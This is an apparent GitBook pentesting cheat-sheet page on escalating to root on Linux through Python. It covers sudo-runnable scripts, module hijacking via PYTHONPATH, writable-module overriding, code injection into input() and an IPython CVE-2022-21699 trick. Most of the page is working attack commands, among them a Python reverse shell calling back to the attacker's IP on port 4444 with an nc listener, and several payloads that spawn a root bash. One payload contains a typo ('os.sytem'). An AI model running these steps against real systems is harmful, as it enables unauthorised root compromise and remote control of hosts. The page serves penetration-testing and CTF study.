Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

Python Privilege Escalation

Python binary is vulnerable to privilege escalation in some situations.

Sudo PrivEsc

Replace with Arbitrary Script

sudo -l

(root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py
Copied!

If the python script is under the current user's home directory, we can remove the script and create the new one with the same name.

rm -rf /home/<username>/example.py
touch /home/<username>/example.py
Copied!

We can insert arbitrary code in the new script. For example,

import os;os.system('/bin/bash')
Copied!

Module Hijacking

Assume the python script can be executed as root with SETENV,NOPASSWD. For example,

sudo -l

(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/example.py
Copied!

With SETENV, we can change PYTHONPATH when executing the script, and insert malicious script to the module which is imported in the script. First off, check what module is imported in the python script (e.g. /opt/example.py here).

import random

print(random.randint(1, 8))
Copied!

We can forge the imported module.

vim /tmp/random.py
Copied!

The content of the module is below. This is a script that executes reverse shell. Replace <local-ip> with your local ip address.

import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
Copied!

After that, in another local terminal, start listener for getting a shell.

nc -lvnp 4444
Copied!

Then run the python script with updating PYTHONPATH in the remote machine.

sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/example.py
Copied!

By setting "PYTHONPATH=/tmp/", the python script will import modules from /tmp/ directories so the "random" module is imported from /tmp/random.py. Finally, we should get a shell in local terminal.

Module Overriding

If the Python script contains a module that can be modified by current user, we can inject arbitrary code into the module. First, check what modules the Python script uses.

# example.py
import random
Copied!

Assume the “random” module is used in the script. Find the path of the module and check if it’s writable.

find / -name "random.py" 2>/dev/null
ls -al /usr/lib/python3.6/random.py
Copied!

If we know we can modify it, inject arbitrary code in this module. Assume the “random” module path is /usr/lib/python3.6/random.py.

# /usr/lib/python3.6/random.py
import os;os.sytem('/bin/bash')
Copied!

Then execute the Python script and we can spawn the root shell.

OS Commands in input()

If you find the executable which is created in Python. For instance,

./executable

Enter some input:
Copied!

You can enter OS commands in some input.

__import__('os').system('id')
Copied!

For example,

./executable

Enter some input: __import__('os').system('id')
Copied!

IPython Privilege Escalation (CVE-2022-21699)

Interective Python (IPython) is a command shell for interective computing in multiple programming languages.

# -m: file mode (rwx)
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/exploit.py
Copied!

References

  • https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/

PreviousPython Jails EscapeNextPython Yaml Privilege Escalation

Last updated 1 year ago

  • Sudo PrivEsc
  • OS Commands in input()
  • IPython Privilege Escalation (CVE-2022-21699)
  • References
Page cover image